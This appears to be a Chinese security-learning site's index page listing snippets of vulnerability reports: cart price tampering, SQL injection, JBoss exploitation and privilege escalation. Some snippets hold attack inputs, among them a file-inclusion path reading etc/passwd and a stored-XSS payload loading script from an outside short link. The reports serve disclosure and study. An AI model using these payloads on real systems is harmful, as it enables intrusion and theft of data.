也买酒篡改总订单金额便宜买拉菲拉 - 网站安全关注热度:22
也买酒购物车逻辑设计缺陷,商品数量可为负,导致总金额任意篡改漏洞。详细说明:购物车总金额=商品1times;数量+商品2times;数量这里虽然前台限制了数量,但是可以通过篡改post的数据..[详情]
腾讯QQ群无需群主和管理员权限修改群资料(已修关注热度:32
我创建了一个群,在修改好群资料(昵称,简介等等)之后提交的时候进行抓包,然后把post的数据中的群号改成了我加入的一个群,提交完毕,我加入的群资料被改。下图为修改并提交..[详情]
链家旗下自如主站文件包含(读取) - 网站安全 -关注热度:26
http: www ziroom com index php?_a=click_p= etc passwd%00 jpg修复方案:你懂得..[详情]
讨论“get”和“post”安全性 - 网站安全 - 自学关注热度:19
get安全,还是post安全?这或许是大家总结两者必须要分析的内容,因为这涉及到我们将内容从浏览器传送到服务器的安全性,选择不当将会带来巨大的不安全因素,从而可能带来巨大的..[详情]
伪静态转化动态执行注入 - 网站安全 - 自学php关注热度:27
第一次发帖子,就拿昨天的一个思路给大家吧。测试的CMS:建站之星。因为做伪静态也比较便于SEO,所以现在很多的CMS也有伪静态。然而,伪静态,主要是为了隐藏传递的参数名,它只..[详情]
cmseasy盲注 - 网站安全 - 自学php关注热度:26
出错的是一个通用函数,所以注入不只一处,在这里就用能够相对简单利用的来写。lib default ballot_act phpfunction index_action() { if (front::post( 39;submit 39;)) {..[详情]
JBoss远程方法调用漏洞利用详解 - 网站安全 - 自学关注热度:32
早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章,对我等菜鸟来说那边文章看起来还是很吃力的,所以查了查国内外的资料,翻译写了这边文章,记录一下。在JBoss服..[详情]
WordPress插件formcraft Sql注射 - 网站安全 - 自学php关注热度:25
标题 : WordPress formcraft Plugin Sql Injection 作者: Ashiyane Digital Security Team 软件下载: www wordpress org 测试环境: Windows , Linux 漏洞 : Sql..[详情]
iGENUS5.0邮件系统的一些漏洞打包(注射及登陆等关注热度:34
没事的时候下载了iGENUS5 0来看了看,时间紧,只看了个大概。大量政府、学校、科研机构、大型公司在使用这套系统。先说下我使用的版本和环境:整套程序,没有防注入措施,除邮件..[详情]
任我行CRM权限绕过、上传、XSS、SQL注入各种简单关注热度:43
任我行CRM系统的权限绕过、上传、XSS、SQL注入各种简单测试某公司内部网络使用这套系统,第一回见到,看到WEB应用就忍不住手贱~~1、上传个人平台里面的编写内部邮件的时候上传附件..[详情]
C#防SQL注入代码的实现方法 - 网站安全 - 自学ph关注热度:19
对于网站的安全性,是每个网站开发者和运营者最关心的问题。网站一旦出现漏洞,那势必将造成很大的损失。为了提高网站的安全性,首先网站要防注入,最重要的是服务器的安全设..[详情]
神州租车任意用户密码修改 - 网站安全 - 自学p关注热度:26
问题出在神州租车的app端,校验机制设计的太脆弱~下面是修改用户个人资料的请求数据包,数据包中的验证部分account、password居然是公共的所有用户的验证都是同样的值,又没有其他的..[详情]
安全狗高权限时的提权方法 - 网站安全 - 自学p关注热度:29
当权限是administrator时可以直接上远控并且成功执行exe恶意文件远控上线有的管理员以为安装了安全狗就万无一失,但是有了键盘记录这不等于像我们拿到权限后要做的事情一样么。安全..[详情]
联通wo邮箱存储型XSS - 网站安全 - 自学php关注热度:16
给邮箱发一封邮件,由于QQ邮箱发到wo邮箱总是投递不成功,内容我直接贴上来吧scriptalert(跨站) scriptscript src=http: goo gl Hprf82 script textareascript src=http: goo gl Hprf82..[详情]
Informix数据库SQL注入实战 - 网站安全 - 自学php关注热度:24
在最近的应用程序渗透测试中,我发现一个有意思的sql漏洞(SQLI中)。SQLI出现这种情况的原因:1 开发中带来的问题2 数据库正在使用下面,我来介绍介绍我遇到的问题以及如何解决并..[详情]
站长推荐
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com